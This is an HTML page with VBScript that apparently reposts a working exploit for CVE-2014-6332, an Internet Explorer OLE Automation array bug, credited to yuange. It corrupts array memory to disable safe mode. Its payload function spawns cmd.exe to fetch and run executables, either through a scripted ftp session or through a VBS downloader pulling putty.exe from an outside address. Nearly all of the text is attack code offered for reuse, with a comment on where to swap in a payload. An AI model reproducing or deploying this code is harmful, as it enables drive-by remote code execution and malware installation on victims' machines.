Internet Explorer < 11 - OLE Automation Array Remote Code Execution
//*
allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
cve-2014-6332 exploit
https://twitter.com/yuange75
http://hi.baidu.com/yuange1975
*//
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa() //修改各种版本修改这个函数的内容就可以了
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"
//ftp版本
shell.ShellExecute "cmd.exe" , "/c @echo off & set ftpfilename=autoftp.cfg & echo open 127.0.0.1 >'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo bin >>'%ftpfilename%' & echo lcd d:\ >>'%ftpfilename%' & echo get calc.exe >>'%ftpfilename%' & echo bye >>'%ftpfilename%' & ftp -s:'%ftpfilename%' & del '%ftpfilename%' & start d:\calc.exe"
//
//http下载版本
objWsh.run "cmd.exe /c echo >>d:\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>d:\text.vbs xPost.Open ""GET"",""http://172.16.22.100/putty.exe"",0 & echo >>d:\text.vbs xPost.Send() & echo >>d:\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>d:\text.vbs sGet.Mode=3 & echo >>d:\text.vbs sGet.Type=1 & echo >>d:\text.vbs sGet.Open() & echo >>d:\text.vbs sGet.Write xPost.ResponseBody & echo >>d:\text.vbs sGet.SaveToFile ""d:\putty.exe"",2",0
objWsh.run "cscript.exe d:\text.vbs",0,true
wscript.sleep 10000
objWsh.run "d:\putty.exe"
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=readmemo(i+&h120+k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function
function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>
</body>
</html>
转载于:https://blog.51cto.com/0daysec/1580845